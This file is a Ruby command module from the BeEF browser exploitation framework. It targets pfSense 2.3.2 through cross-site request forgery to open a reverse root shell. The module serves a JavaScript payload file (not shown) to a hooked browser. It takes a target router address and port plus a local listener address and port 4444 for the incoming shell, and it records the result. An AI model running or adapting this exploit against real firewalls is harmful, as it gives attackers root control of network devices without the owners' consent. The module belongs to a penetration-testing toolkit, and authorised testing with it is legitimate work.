#
# Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Pfsense_2_3_2_reverse_root_shell_csrf < BeEF::Core::Command
  def pre_send
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/x.js', '/x', 'js')
  end

  def self.options
    configuration = BeEF::Core::Configuration.instance
    lhost = configuration.get('beef.http.host').to_s
    lhost = '' if lhost == '0.0.0.0'
    [
      { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.254' },
      { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
      { 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost },
      { 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444' }
    ]
  end

  def post_execute
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('x.js')
    save({ 'result' => @datastore['result'] })
  end
end
